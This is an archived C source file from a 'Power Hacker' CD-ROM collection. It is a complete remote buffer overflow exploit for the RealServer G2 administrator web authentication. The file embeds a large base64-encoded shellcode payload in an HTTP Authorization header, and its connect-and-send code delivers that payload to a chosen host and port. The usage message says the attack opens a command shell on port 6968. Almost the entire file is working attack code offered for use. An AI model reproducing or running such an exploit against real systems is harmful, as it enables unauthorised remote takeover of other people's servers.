home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / teso / realown.c < prev    next >
C/C++ Source or Header  |  2002-05-07  |  11KB  |  279 lines
  1. <html>/* RealNetworks RealServer G2 buffer overflow exploit
  2.  *
  3.  * by dark spyrit <dspyrit@beavuh.org>
  4.  * quick unix port by team teso
  5.  *
  6.  * the windows binary is available at http://www.beavuh.org.
  7.  *
  8.  * This exploits a buffer overflow in RealServers web authentication on
  9.  * the administrator port - hence the reason the shellcode is base64 encoded.
  10.  * This has been tested on the NT version with a default installation.
  11.  * If RealServer is installed in a different directory than the default, the
  12.  * buffer will need to be adjusted accordingly.
  13.  * The administrator port is randomly selected at installation, but as you'll
  14.  * only be testing on your own networks this won't matter :)
  15.  */
  16.  
  17. #include <sys/types.h>
  18. #include <sys/time.h>
  19. #include <sys/socket.h>
  20. #include <netinet/in.h>
  21. #include <arpa/inet.h>
  22. #include <unistd.h>
  23. #include <errno.h>
  24. #include <stdlib.h>
  25. #include <stdio.h>
  26. #include <string.h>
  27. #include <fcntl.h>
  28. #include <netdb.h>
  29.  
  30.  
  31. /* local functions
  32.  */
  33. unsigned long int    net_resolve (char *host);
  34. int            net_connect (struct sockaddr_in *cs, char *server,
  35.     unsigned short int port, int sec);
  36.  
  37. unsigned char    sploit[] =
  38.     "GET /admin/index.html HTTP/1.0\x0d\x0a"
  39.     "Connection: Keep-Alive\x0d\x0a"
  40.     "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)\x0d\x0a"
  41.     "Host: 111.111.11.1:1111\x0d\x0a"
  42.     "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\x0d\x0a"
  43.     "Accept-Language: en\x0d\x0a"
  44.     "Accept-Charset: iso-8859-1,*,utf-8\x0d\x0a"
  45.     "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  46.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  47.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  48.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  49.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  50.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  51.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  52.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  53.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  54.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  55.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  56.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  57.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  58.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  59.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  60.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  61.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  62.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  63.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  64.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  65.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  66.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  67.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  68.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  69.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  70.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  71.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  72.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  73.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  74.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  75.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  76.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  77.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  78.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  79.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  80.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  81.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  82.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  83.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  84.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  85.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  86.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  87.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  88.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  89.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  90.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  91.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  92.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  93.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  94.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  95.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  96.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  97.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  98.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  99.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  100.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  101.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  102.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  103.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  104.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  105.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  106.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  107.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  108.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  109.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  110.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  111.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  112.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  113.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  114.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  115.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  116.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  117.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  118.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  119.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  120.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  121.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  122.     "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf"
  123.     "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E"
  124.     "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB"
  125.     "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR"
  126.     "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9"
  127.     "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP"
  128.     "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF"
  129.     "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/"
  130.     "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX"
  131.     "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68"
  132.     "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf"
  133.     "84fyZ/////w==\x0d\x0a\x0d\x0a\x00";
  134.  
  135.  
  136. int
  137. main (int argc, char **argv)
  138. {
  139.     int            socket;
  140.     char            *server;
  141.     unsigned short int    port;
  142.     struct sockaddr_in    sa;
  143.  
  144.     if (argc != 3) {
  145.         printf ("RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.\n"
  146.             "by dark spyrit <dspyrit@beavuh.org>, port by team teso\n\n"
  147.             "usage: %s <host> <admin_port>\n"
  148.             "eg - %s host.com 6666\n"
  149.             "the exploit will spawn a command prompt on port 6968\n\n", argv[0], argv[0]);
  150.  
  151.         exit (EXIT_FAILURE);
  152.     }
  153.  
  154.     server = argv[1];
  155.     port = atoi (argv[2]);
  156.  
  157.     socket = net_connect (&sa, server, port, 45);
  158.     if (socket <= 0) {
  159.         perror ("net_connect");
  160.         exit (EXIT_FAILURE);
  161.     }
  162.  
  163.     write (socket, sploit, strlen (sploit));
  164.     sleep (1);
  165.     close (socket);
  166.  
  167.     printf ("data sent. try \"telnet %s 6968\" now \n", server);
  168.  
  169.     exit (EXIT_SUCCESS);
  170. }
  171.  
  172.  
  173. unsigned long int
  174. net_resolve (char *host)
  175. {
  176.     long        i;
  177.     struct hostent    *he;
  178.  
  179.     i = inet_addr (host);
  180.     if (i == -1) {
  181.         he = gethostbyname (host);
  182.         if (he == NULL) {
  183.             return (0);
  184.         } else {
  185.             return (*(unsigned long *) he->h_addr);
  186.         }
  187.     }
  188.  
  189.     return (i);
  190. }
  191.  
  192.  
  193. int
  194. net_connect (struct sockaddr_in *cs, char *server,
  195.     unsigned short int port, int sec)
  196. {
  197.     int        n, len, error, flags;
  198.     int        fd;
  199.     struct timeval    tv;
  200.     fd_set        rset, wset;
  201.  
  202.     /* first allocate a socket */
  203.     cs->sin_family = AF_INET;
  204.     cs->sin_port = htons (port);
  205.     fd = socket (cs->sin_family, SOCK_STREAM, 0);
  206.     if (fd == -1)
  207.         return (-1);
  208.  
  209.     cs->sin_addr.s_addr = net_resolve (server);
  210.     if (cs->sin_addr.s_addr == 0) {
  211.         close (fd);
  212.         return (-1);
  213.     }
  214.  
  215.     flags = fcntl (fd, F_GETFL, 0);
  216.     if (flags == -1) {
  217.         close (fd);
  218.         return (-1);
  219.     }
  220.     n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
  221.     if (n == -1) {
  222.         close (fd);
  223.         return (-1);
  224.     }
  225.  
  226.     error = 0;
  227.  
  228.     n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
  229.     if (n < 0) {
  230.         if (errno != EINPROGRESS) {
  231.             close (fd);
  232.             return (-1);
  233.         }
  234.     }
  235.     if (n == 0)
  236.         goto done;
  237.  
  238.     FD_ZERO(&rset);
  239.     FD_ZERO(&wset);
  240.     FD_SET(fd, &rset);
  241.     FD_SET(fd, &wset);
  242.     tv.tv_sec = sec;
  243.     tv.tv_usec = 0;
  244.  
  245.     n = select(fd + 1, &rset, &wset, NULL, &tv);
  246.     if (n == 0) {
  247.         close(fd);
  248.         errno = ETIMEDOUT;
  249.         return (-1);
  250.     }
  251.     if (n == -1)
  252.         return (-1);
  253.  
  254.     if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
  255.         if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
  256.             len = sizeof(error);
  257.             if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
  258.                 errno = ETIMEDOUT;
  259.                 return (-1);
  260.             }
  261.             if (error == 0) {
  262.                 goto done;
  263.             } else {
  264.                 errno = error;
  265.                 return (-1);
  266.             }
  267.         }
  268.     } else
  269.         return (-1);
  270.  
  271. done:
  272.     n = fcntl(fd, F_SETFL, flags);
  273.     if (n == -1)
  274.         return (-1);
  275.  
  276.     return (fd);
  277. }
  278.  
  279.